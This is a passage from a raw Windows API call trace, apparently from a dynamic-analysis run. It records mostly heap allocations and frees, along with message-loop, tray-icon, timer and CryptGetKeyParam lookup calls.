Flags=0x0, Size=0x10) returned 0x9bda50 [0186.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0186.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0186.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0186.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.097] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.098] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0186.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0186.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0186.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.099] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0186.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.100] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.100] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2838, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2838*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0186.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0186.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.103] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 1 [0186.103] TranslateMessage (lpMsg=0x87e924) returned 0 [0186.103] DispatchMessageW (lpMsg=0x87e924) returned 0x0 [0186.103] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87dfc0) returned 1 [0186.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.104] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0186.104] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0186.104] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0186.104] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0186.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.105] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.105] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.105] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.105] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.105] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.105] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0186.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0186.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0186.107] RtlAllocateHeap 